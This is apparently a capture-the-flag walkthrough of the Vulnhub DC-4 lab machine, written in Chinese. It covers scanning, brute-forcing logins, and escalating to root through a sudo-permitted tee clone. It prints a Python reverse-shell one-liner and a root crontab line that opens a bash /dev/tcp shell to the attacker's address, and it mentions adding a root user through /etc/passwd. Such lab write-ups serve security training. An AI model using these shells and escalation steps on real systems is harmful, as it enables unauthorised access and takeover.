Vulnhub靶机DC-4通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-4,313/
¶开始
nmap 扫描
开了80 和22 端口
要登陆
dirb http://192.168.123.7 扫描一下目录
没有什么有用的信息
用burpsuite爆破一下
爆破出来了 虽然不知道是哪个密码 但是进去了
发现可以命令执行
反弹一个shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.123.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
在home目录发现三个用户
进入jim的目录发现有个老密码的备份
猜测可能是ssh的密码
复制下来用hydra爆破一下
爆破出一个jim的密码
登陆上 看到了mbox的内容 是一封邮件
进去/var/mail里面看一下 得到了Charles的密码
登陆
sudo -l 看一下
teehee可以用来提权
但是没有听说过这个命令啊
不知道怎么利用 看一下help
和tee命令一样 可能被作者改了迷惑我们吧
tee命令介绍https://www.runoob.com/linux/linux-comm-tee.html
可以利用写crontab定时任务进行反弹shell https://www.freebuf.com/articles/system/175453.html
* * * * * root bash -c "bash -i >&/dev/tcp/192.168.123.4/7777 0>&1"
得到最终flag
有没有不用反弹shell就可以提权呢?
可以
写/etc/passwd添加一个最高权限的用户
¶总结
这个靶机也相对简单,前面命令执行的都没有过滤直接就能反弹shell了,后面多学了一种提权方式,可以通过写/etc/passwd来提权